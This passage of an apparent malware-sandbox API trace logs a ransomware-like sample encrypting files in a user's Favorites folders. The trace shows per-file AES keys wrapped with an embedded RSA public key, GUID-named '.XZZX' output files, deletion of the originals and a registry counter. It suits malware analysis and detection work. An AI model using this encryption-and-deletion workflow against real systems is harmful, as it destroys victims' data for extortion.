lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x2a, lpOverlapped=0x0) returned 1 [0046.201] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb4 [0046.201] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0046.202] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb9 [0046.202] SetErrorMode (uMode=0x1) returned 0x1 [0046.202] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0046.202] OutputDebugStringW (lpOutputString="end") [0046.202] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0046.202] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0046.202] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x42d5ec8) returned 1 [0046.202] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5ec8, dwCertEncodingType=0x1, pInfo=0x3e405a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e405d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e405d8*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e5d10) returned 1 [0046.202] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.203] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0046.203] CryptEncrypt (in: hKey=0x42e5d10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0046.203] CryptEncrypt (in: hKey=0x42e5d10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5f50*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5f50*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0046.203] WriteFile (in: hFile=0x55c, lpBuffer=0x42d5f50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d5f50*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0046.203] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0046.203] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0046.203] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0046.204] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0046.204] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x56c) returned 0x0 [0046.204] RegQueryValueExW (in: hKey=0x56c, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x44, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0046.204] RegCloseKey (hKey=0x56c) returned 0x0 [0046.204] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x56c) returned 0x0 [0046.204] RegSetValueExW (in: hKey=0x56c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x45, cbData=0x4 | out: lpData=0x42cdfec*=0x45) returned 0x0 [0046.204] RegCloseKey (hKey=0x56c) returned 0x0 [0046.204] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.204] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.205] CloseHandle (hObject=0x55c) returned 1 [0046.205] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0046.206] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0046.206] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url")) returned 1 [0046.207] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url")) returned 0 Thread: id = 164 os_tid = 0x920 [0046.246] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.246] lstrcpyW (in: lpString1=0x417f460, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0046.246] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0046.246] SetErrorMode (uMode=0x1) returned 0x1 [0046.246] lstrcpyW (in: lpString1=0x417f860, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0046.246] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x7c9eb5e5, Data2=0x22e2, Data3=0x4341, Data4=([0]=0x8f, [1]=0x9e, [2]=0xba, [3]=0xa, [4]=0xd5, [5]=0xe4, [6]=0xe, [7]=0xed))) returned 0x0 [0046.246] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0046.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0046.246] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned 100 [0046.246] StrStrW (lpFirst="Microsoft Store.url", lpSrch="XZZX") returned 0x0 [0046.246] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x20) returned 1 [0046.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0046.248] ReadFile (in: hFile=0x568, lpBuffer=0x34e068, nNumberOfBytesToRead=0x86, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesRead=0x417e418*=0x86, lpOverlapped=0x0) returned 1 [0046.249] CloseHandle (hObject=0x568) returned 1 [0046.249] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0046.250] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0046.250] SetErrorMode (uMode=0x1) returned 0x1 [0046.250] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0046.251] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5fd8) returned 1 [0046.254] CryptGenKey (in: hProv=0x42d5fd8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27d78) returned 1 [0046.416] CryptExportKey (in: hKey=0x3e27d78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0046.416] CryptExportKey (in: hKey=0x3e27d78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0046.416] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.417] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0046.417] CryptDestroyKey (hKey=0x3e27d78) returned 1 [0046.417] CryptReleaseContext (hProv=0x42d5fd8, dwFlags=0x0) returned 1 [0046.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1844FE2A092A01627C9EB5E50D41E5AA.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\1844fe2a092a01627c9eb5e50d41e5aa.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0046.418] WriteFile (in: hFile=0x574, lpBuffer=0x34e068*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesWritten=0x417e438*=0x86, lpOverlapped=0x0) returned 1 [0046.418] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x86 [0046.418] WriteFile (in: hFile=0x574, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.418] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8b [0046.419] WriteFile (in: hFile=0x574, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x26, lpOverlapped=0x0) returned 1 [0046.419] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb1 [0046.419] WriteFile (in: hFile=0x574, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.419] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb6 [0046.419] SetErrorMode (uMode=0x1) returned 0x1 [0046.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0046.419] OutputDebugStringW (lpOutputString="end") [0046.419] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0046.419] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0046.419] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5fd8) returned 1 [0046.420] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5fd8, dwCertEncodingType=0x1, pInfo=0x3e40670*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e406a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e406a8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e53d0) returned 1 [0046.420] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.421] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0046.421] CryptEncrypt (in: hKey=0x42e53d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0046.421] CryptEncrypt (in: hKey=0x42e53d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d6060*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d6060*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0046.421] WriteFile (in: hFile=0x574, lpBuffer=0x42d6060*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d6060*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0046.421] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0046.421] WriteFile (in: hFile=0x574, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.421] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0046.422] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0046.422] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x578) returned 0x0 [0046.422] RegQueryValueExW (in: hKey=0x578, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x45, lpcbData=0x417dfdc*=0x4) returned 0x0 [0046.422] RegCloseKey (hKey=0x578) returned 0x0 [0046.422] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x578) returned 0x0 [0046.422] RegSetValueExW (in: hKey=0x578, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x46, cbData=0x4 | out: lpData=0x417dfec*=0x46) returned 0x0 [0046.422] RegCloseKey (hKey=0x578) returned 0x0 [0046.422] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.422] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.422] CloseHandle (hObject=0x574) returned 1 [0046.423] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0046.423] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0046.423] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url")) returned 1 [0046.424] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url")) returned 0 Thread: id = 165 os_tid = 0x380 [0046.426] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.426] lstrcpyW (in: lpString1=0x417f460, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0046.426] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.426] SetErrorMode (uMode=0x1) returned 0x1 [0046.426] lstrcpyW (in: lpString1=0x417f860, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0046.426] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xeaf8ad0b, Data2=0xe5c2, Data3=0x4f95, Data4=([0]=0x8f, [1]=0x41, [2]=0x79, [3]=0xaa, [4]=0xd3, [5]=0xa6, [6]=0x62, [7]=0x7d))) returned 0x0 [0046.426] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0046.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0046.426] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned 94 [0046.426] StrStrW (lpFirst="MSN Autos.url", lpSrch="XZZX") returned 0x0 [0046.426] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x20) returned 1 [0046.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0046.426] ReadFile (in: hFile=0x56c, lpBuffer=0x34e188, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0046.427] CloseHandle (hObject=0x56c) returned 1 [0046.427] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0046.427] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0046.427] SetErrorMode (uMode=0x1) returned 0x1 [0046.428] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0046.428] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d60e8) returned 1 [0046.430] CryptGenKey (in: hProv=0x42d60e8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27db8) returned 1 [0046.514] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0046.514] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0046.514] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.515] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0046.515] CryptDestroyKey (hKey=0x3e27db8) returned 1 [0046.515] CryptReleaseContext (hProv=0x42d60e8, dwFlags=0x0) returned 1 [0046.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\833DF956476C97EAEAF8AD0B4B847C32.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\833df956476c97eaeaf8ad0b4b847c32.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0046.515] WriteFile (in: hFile=0x56c, lpBuffer=0x34e188*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0046.516] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0046.516] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.516] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 